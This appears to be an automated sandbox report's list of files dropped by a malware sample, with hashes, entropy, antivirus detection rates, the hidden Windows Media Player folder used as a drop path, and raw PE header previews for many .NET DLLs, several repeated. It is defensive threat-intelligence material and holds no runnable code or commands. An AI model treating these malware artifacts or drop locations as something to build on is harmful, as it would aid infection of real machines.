                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64000
                                                                                        Entropy (8bit):5.857602289000348
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):34816
                                                                                        Entropy (8bit):5.636032516496583
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):24576
                                                                                        Entropy (8bit):5.535426842040921
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):41472
                                                                                        Entropy (8bit):5.6808219961645605
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33280
                                                                                        Entropy (8bit):5.634433516692816
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):126976
                                                                                        Entropy (8bit):6.057993947082715
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):23552
                                                                                        Entropy (8bit):5.529329139831718
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.660491370279985
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                        MD5:240E98D38E0B679F055470167D247022
                                                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):89600
                                                                                        Entropy (8bit):5.905167202474779
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38912
                                                                                        Entropy (8bit):5.679286635687991
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):39936
                                                                                        Entropy (8bit):5.629584586954759
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):89600
                                                                                        Entropy (8bit):5.905167202474779
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):38400
                                                                                        Entropy (8bit):5.699005826018714
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                        MD5:87765D141228784AE91334BAE25AD743
                                                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):70144
                                                                                        Entropy (8bit):5.909536568846014
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):70144
                                                                                        Entropy (8bit):5.909536568846014
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):50176
                                                                                        Entropy (8bit):5.723168999026349
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):32256
                                                                                        Entropy (8bit):5.631194486392901
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                        Malicious:true
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):46592
                                                                                        Entropy (8bit):5.870612048031897
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                        Malicious:true
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):69632
                                                                                        Entropy (8bit):5.932541123129161
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
